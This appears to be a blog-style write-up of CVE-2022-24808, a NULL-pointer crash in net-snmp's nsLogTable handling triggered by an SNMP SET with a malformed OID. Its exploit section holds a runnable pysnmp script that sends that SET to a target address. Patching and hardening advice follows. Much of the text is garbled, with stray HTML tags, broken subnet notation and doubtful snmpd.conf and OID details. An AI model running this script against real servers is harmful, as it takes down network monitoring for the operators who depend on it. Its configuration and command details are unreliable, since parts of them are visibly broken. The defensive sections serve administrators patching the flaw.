CVE-2022-24808 - Easy Exploit in net-snmp — How a Bad OID in SET Requests Breaks Things

net-snmp is a backbone tool found all over enterprise networks, responsible for SNMP monitoring, device configuration, and more. In March 2022, a dangerous bug was discovered: CVE-2022-24808. It lets anyone with read-write SNMP credentials crash your SNMP daemon with a single, malformed command — and that means your network management could go dark in an instant.

This post gives you a clear, detailed look at the vulnerability, including simple, exclusive code examples and links to authoritative resources.

What is net-snmp and SNMP?

net-snmp is an open-source suite that lets administrators monitor and manage devices over the Simple Network Management Protocol (SNMP). These tools are everywhere, from routers and printers to Linux and BSD servers, and operate over the network.

SNMP Table Basics

SNMP organizes information as trees of unique identifiers (OIDs—object identifiers). Tables are ways to present data in columns and rows, identified by OIDs. Tools like snmpset let you change values remotely (as long as you have write-access).

Affected versions: Before 5.9.2

- Attack: Anyone with read-write SNMP credentials can send a specially crafted (malformed) OID to the NET-SNMP-AGENT-MIB::nsLogTable using a SET request, causing a NULL pointer dereference (== crash).

Official Advisory and References

- GitHub Security Advisory GHSA-6v97-6v6h-4rwp
- MITRE CVE Details
- net-snmp Commit Fix

Exploit Details: Crashing net-snmp with a Malformed OID

Any user who can write to SNMP (snmpset with correct credentials) can trigger this crash. The bug is in the parsing code of nsLogTable, where a malformed OID can make the code reference a NULL (non-existent) value.

Here’s a step-by-step look

1. The attacker knows (or guesses) the SNMP read-write community string (v1/v2c) or has v3 credentials.

Using a SNMP tool, they craft a malicious OID for the nsLogTable object.

3. A SET request with this OID causes the daemon to dereference a NULL pointer — killing the SNMP service.

Example: How an Attacker Could Trigger the Crash

Below is a Python exploit example using pysnmp (install with pip install pysnmp). This requires the attacker to know the target’s SNMP community string and IP.

from pysnmp.hlapi import *

# Replace these with your target's info
TARGET_IP = '192.168.1.123'
COMMUNITY = 'private'  # Must have write access
PORT = 161

# Malformed nsLogTable OID (intentionally too short)
MALFORMED_OID = '1.3.6.1.4.1.8072.1.9.1.1.'  # Normally needs more "index"
BAD_VALUE = 'crasher'

errorIndication, errorStatus, errorIndex, varBinds = next(
    setCmd(
        SnmpEngine(),
        CommunityData(COMMUNITY, mpModel=1),  # SNMPv2c
        UdpTransportTarget((TARGET_IP, PORT)),
        ContextData(),
        ObjectType(ObjectIdentity(MALFORMED_OID), OctetString(BAD_VALUE))
    )
)

if errorIndication:
    print(f"Error: {errorIndication}")
else:
    print("Request sent! Check if snmpd is still running.")

> On vulnerable systems this will immediately crash snmpd.
> Logs might show a "Segmentation fault" or NULL pointer dereference, depending on how the daemon was started.

1. Update net-snmp

This is the only solid fix—use version 5.9.2 or later. All major Linux distros released patches quickly.

snmpd -v

- On Ubuntu/Debian:  
  

bash

sudo apt-get update && sudo apt-get upgrade net-snmp

- On Red Hat/CentOS:  
  

bash

sudo yum update net-snmp

### 2. Harden Your SNMP Configuration

If upgrade is not possible:

- Always prefer SNMPv3 with strong usernames & passwords.
- Never expose read-write SNMP access over the open Internet.
- For SNMPv1/v2c:
  - Use long, complex community strings (not "public"/"private").
  - Restrict SNMP access to trusted IP ranges.
  - Use firewalls to limit access.

Example restrictive snmpd.conf:

conf
# Only allow access from 192.168.1./24
com2sec myRWUser 192.168.1./24 superSecretRWString

Restrict to local network

view all included .1 80
access myRWGroup "" any noauth exact all all none
<br><br>### 3. <b>Monitor your SNMP daemons</b><br><br>- Regularly check if processes are running.<br>- Watch LOGS for unexpected restarts or segfaults.<br><br>---<br><br>## Real-World Impact<br><br>This kind of bug is serious for any enterprise or network operator using SNMP write-access for device automation or monitoring. An insider, or anyone who sniffs or guesses your SNMPv2c community string, could repeatedly crash your monitoring tools, blind you to outages, or block configuration commands.<br><br>---<br><br>## Conclusion<br><br><b>CVE-2022-24808 is easy to exploit — if you have SNMP write credentials, you can crash snmpd with a malformed OID.</b><br><br><b>Do this right now:</b><br>- Patch net-snmp` to version 5.9.2 or above.
- Never use default or simple SNMP community strings.
- Restrict SNMP access as much as possible.

With a few minutes of work, your network stays safe from this simple (but high-impact) bug.

---

## Links & Further Reading

- GitHub Advisory for CVE-2022-24808
- net-snmp upstream release notes
- CVE MITRE page
- Example net-snmp configuration

---

*Stay patched. Stay safe.*

Timeline

Published on: 04/16/2024 20:15:08 UTC
Last modified on: 04/17/2024 12:48:31 UTC